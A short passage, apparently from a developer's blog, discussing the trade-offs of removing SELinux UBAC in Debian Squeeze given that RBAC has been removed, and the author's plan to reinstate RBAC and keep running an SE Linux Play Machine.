Of course the down-side to removing UBAC is that since RBAC was removed there is no other way of separating SE Linux users, while MCS is good for what it does it wasn’t designed for the purpose of isolating different types of user. So I’ll really want to get RBAC reinstalled before Squeeze is released if I remove UBAC.

Regardless of this I will need to get RBAC working on Squeeze eventually anyway. I’ve had a SE Linux Play Machine running with every release of SE Linux for the last 8 years and I don’t plan to stop now.